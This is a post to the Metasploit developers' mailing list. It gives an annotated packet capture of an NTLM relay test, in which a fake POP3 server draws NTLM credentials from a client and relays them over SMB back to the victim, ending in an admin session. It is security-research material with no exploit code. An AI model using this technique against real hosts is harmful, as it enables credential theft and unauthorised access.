-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Well, this a summary of the results of testing this issue with POP3 secure connection related. I initially missed checking in "Use Security Authentication" for POP account, but after that I got the results. I tried to summarize most important fields in here. It may be redundant or if I missed something please let me know.
This is the pop traffic: Here *.*.*.1 attacker and *.*.*.2 victim ======================================================================== # Initial fake banner POP response 435 9.999064 *.*.*.1 *.*.*.2 POP Response: +OK Microsoft Exchange Server 2003 POP3 server version 6.5.7226.0 ready # Request for Auth: Request command: AUTH, Request parameter: NTLM 441 10.074902 *.*.*.2 *.*.*.1 POP Request: AUTH NTLM 465 10.281719 *.*.*.1 *.*.*.2 POP Continuation # Response with Authorization from client 478 10.603152 *.*.*.2 *.*.*.1 POP Request: TlRM****AAAAGAAYAG4AAAAYABgAhgAAAAYABgBIAAAAGgAaAE4AAAAGAAYAaAAAAAAAAACeAAAABYIAAgUBKAoAAAAPVwBTADIAQQBkAG0AaQBuAGkAcwB0AHIAYQBkAG8AcgBXAFMAMgBj9DfMoj1zHGP0N8yiPXMcY/Q3zKI9cxygdKPIln4+Q+YFSxsQz2uo6nAJ1a/vs+I= # Log in client 508 11.232840 *.*.*.1 *.*.*.2 POP Response: +OK User successfully logged on. # STAT pop3 simple command 509 11.245222 *.*.*.2 *.*.*.1 POP Request: STAT ===================================================================== And the SMB one; here I'll try to put more info about SMB: ===================================================================== # Handshake 454 10.188783 *.*.*.1 *.*.*.2 SMB Negotiate Protocol Request Of course a 0x72 negotiate header and then here are the dialects: (Sorry about the verbosity). Requested Dialects: Dialect: PYTHON SMB 0.1 Dialect: LANMAN1.0 Dialect: Windows for Workgroups 3.1a Dialect: LM1.2X002 Dialect: LANMAN2.1 Dialect: NT LM 0.12 The victim's response (relevant fields only): Dialect Index: 5, greater than LANMAN2.1 Security Mode: 0x03 (USER security, ENCRYPTED pwd, Chall/Resp, Signatures disabled and not required). This is interesting: 461 10.226109 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE Security Blob: 4E544C4D535350000100000007B200000000000000000000... NTLMSSP NTLMSSP identifier: NTLMSSP NTLM Message Type: NTLMSSP_NEGOTIATE (0x00000001) Flags: 0x0000b207 (Negotiate Always Signs | Negotiate Workstation Supplied | Negotiate Domain | Negotiate NTLM key | Request Target | Negotatiate OEM | Negotiate UNICODE Native OS: Windows 2000 2195 Native LAN Manager: Windows 2000 5.0 464 10.281135 *.*.*.2 *.*.*.1 SMB Session Setup AndX Response, NTLMSSP_CHALLENGE, Error: STATUS_MORE_PROCESSING_REQUIRED # Session Setup Adnx Response: Action : 0x0000 (Not logged in as GUEST) Security Blob: NTLMSSP NTLMSSP identifier: NTLMSSP NTLM Message Type: NTLMSSP_CHALLENGE(0x00000002) Reserved: 0 Native OS: 5.1 Native LAN Manager: Windows 200 LAN Manager 480 10.603844 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, NTLMSSP_AUTH, User: WS2\Admin # NTLMSSP NTLMSSP Message Type: NTLMSSP_AUTH (0x03) Lan Manager Response: 6F437CCA23D731C63... NTLM Response: A074A3C8967E3E43E6... Domain, Username, and Hostname... 506 11.232199 *.*.*.2 *.*.*.1 SMB Session Setup AndX Response STATUS_SUCCESS 513 11.259777 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: \\*.*.*.2\IPC$ ====================================================================== After the 513 we must agree the rest it's history, we're interested in negotiation here. Sincerely. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFJUT6JH+KgkfcIQ8cRAuacAKCqkUUMG0/8qpGQqoFw4lHt5NlPBQCfeqss Iz3Jm/nYjgzXv1kdbvOwhQA= =CEuB -----END PGP SIGNATURE----- _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
